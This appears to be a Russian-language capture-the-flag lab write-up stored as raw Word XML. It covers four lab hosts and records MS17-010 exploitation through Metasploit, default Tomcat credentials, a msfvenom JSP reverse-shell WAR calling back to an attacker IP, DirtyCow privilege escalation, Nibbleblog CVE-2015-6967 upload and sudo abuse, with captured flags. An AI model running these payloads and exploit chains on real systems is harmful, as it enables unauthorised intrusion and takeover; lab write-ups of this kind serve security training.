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7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">==192.168.100.7== - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C7A1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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Проверяем уязвима ли машина к MS17-010 с помощью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smb-vuln-ms17-010 192.168.100.7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102C83" wp14:editId="32D45EB9">
            <wp:extent cx="4932218" cy="315071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5755" cy="31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A57EE" w:rsidRDefault="00EA57EE" w:rsidP="00BF5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Запускаем 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msfconsole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находим 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17-010. Производим минимальную настройку и запускаем. Спустя несколько попыток получаем соединение и забираем флаг с рабочего стола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Peter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BF5650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C7A11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30F9C" wp14:editId="68225FA7">
            <wp:extent cx="6054436" cy="20800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5651" cy="20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EE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AD7D800" wp14:editId="615E6F8B">
            <wp:extent cx="5056312" cy="27570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320" cy="27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t>flag{c6acfd25d389305b9cc20f6568e3bce2}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564C149" wp14:editId="593C5B9E">
            <wp:extent cx="5487166" cy="876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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>==192.168.100.12== - tomcat</w:t>
      </w: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Заходим на </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сайт  http://192.168.100.12:8080</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и видим что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только что был установлен. Скорее всего пароль остался дефолтным. Перебираем стандартные пароли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получает доступ (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s3cret)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28AC079" wp14:editId="4E4EE203">
            <wp:extent cx="5940425" cy="24796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</w:rPr>
        <w:t>Создаем</w:t>
      </w:r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C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>шелл</w:t>
      </w:r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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-p java/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jsp_shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LHOST=10.0.2.4 LPORT=4444 -f </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>war &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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shell.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w: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>и затем заливаем его на сайт и переходим http://192.168.100.12:8080/shell/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E578AC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Получаем подключение и забираем первый флаг пользователя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{c351df7d89f09ba2e58e98d2406f7d54}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E578AC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127F48" wp14:editId="4335CE78">
            <wp:extent cx="2707231" cy="3886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418" cy="39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78AC" w:rsidRPr="001C7A11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python -c "import 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pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E578AC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Закидываем на машину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DirtyCow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компилируем файл </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>( О</w:t>
      </w:r>
      <w:proofErr w:type="gram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DirtyCow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м</w:t>
      </w:r>
      <w:r w:rsidR="00BF5650">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ожно узнать с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF5650">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linpeas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF5650">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)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578AC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77616A" wp14:editId="02E11573">
            <wp:extent cx="4709798" cy="41771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263" cy="41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578AC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Запускаем его и создаем нового пользователя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с паролем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hacker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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28E8B1" wp14:editId="1F3C1285">
            <wp:extent cx="5391902" cy="193384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578AC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>Заходим под новым пользователем и забираем флаг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61B778" wp14:editId="6D93F9A9">
            <wp:extent cx="5134692" cy="276263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t>flag{5cf994319843b8ca8ea46f615ae32e80}</w:t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7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>==192.168.100.24==</w:t>
      </w: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Через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ffuf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находим страницы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638341" wp14:editId="75B7C840">
            <wp:extent cx="5940425" cy="32854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На странице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подбираем пароль и логин (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) и получаем доступ к кабинету админа</w:t>
      </w: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На странице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узнаем версию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Nibbleblog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4.0.3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2D68CE" wp14:editId="6E1D57DD">
            <wp:extent cx="5940425" cy="23844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BF5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EA57EE" w:rsidP="00BF5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7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Воспользуемся  CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-2015-6967 которая загружает наш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по адресу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plugins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my_image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image.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EA57EE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F565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51E563" wp14:editId="27C51D78">
            <wp:extent cx="5940425" cy="27584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И получаем страницу со строкой для команд в которой прописываем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F56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C35DB" wp14:editId="2D1D2D18">
            <wp:extent cx="5940425" cy="1454785"/>
            <wp:effectExtent l="19050" t="19050" r="22225" b="120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Получаем доступ, делаем стабильный шелл и получаем первый флаг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{6d6c8c5b880f4017d36ac79963d5be0c}</w:t>
      </w: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565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304CFE" wp14:editId="63EBAFE7">
            <wp:extent cx="4172532" cy="218152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565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502026C" wp14:editId="577CFDD3">
            <wp:extent cx="5658640" cy="195289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Проверяем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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>видим</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> что можем использовать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без пароля. Читаем флаг в директории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{eec8bcb745ff86fba3b662e5c22ff609}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F56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245E6" wp14:editId="1F12CD2E">
            <wp:extent cx="5940425" cy="942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F56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9EA9DE" wp14:editId="33387B4B">
            <wp:extent cx="5039428" cy="857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EA" w:rsidRPr="001C7A11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Pr="001C7A11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7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>==192.168.100.20==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A938EA" w:rsidRPr="001C7A11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="00A938EA" w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">роверяем наличие уязвимости </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A938EA" w:rsidRPr="001C7A1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="00A938EA" w:rsidRPr="001C7A11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="00A938EA" w:rsidRPr="001C7A11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A938EA" w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> smb-vuln-ms17-010 192.168.100.20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4730C5" wp14:editId="3DD6C1D1">
            <wp:extent cx="5940425" cy="29952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</w:t>
      </w:r>
      <w:r w:rsidR="00A938EA" w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ерез </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A938EA" w:rsidRPr="001C7A11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 w:rsidR="00A938EA" w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускаем ms17-010 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A938EA" w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A938EA" w:rsidRPr="001C7A11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и получаем доступ под системой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Pr="001C7A11" w:rsidRDefault="001C7A11" w:rsidP="00BF56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0A33ED" wp14:editId="326B0F17">
            <wp:extent cx="5940425" cy="2781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EA" w:rsidRPr="001C7A11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Находим файл через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-f *.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забираем флаг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 w:rsidRPr="001C7A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604C77" wp14:editId="2914DD97">
            <wp:extent cx="5940425" cy="17500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F5650" w:rsidRDefault="00BF5650" w:rsidP="00BF565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938EA" w:rsidRPr="001C7A11" w:rsidRDefault="00A938EA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t>flag{2027838ae5b03434ee0202a0d785b929}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A938EA" w:rsidRPr="001C7A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7EE"/>
    <w:rsid w:val="001C7A11"/>
    <w:rsid w:val="002B41E5"/>
    <w:rsid w:val="0036323C"/>
    <w:rsid w:val="00A938EA"/>
    <w:rsid w:val="00BF5650"/>
    <w:rsid w:val="00E578AC"/>
    <w:rsid w:val="00EA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29B12"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4DC3B5EF-8BEA-401F-B827-88AA6F64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8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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-17T16:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-22T20:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>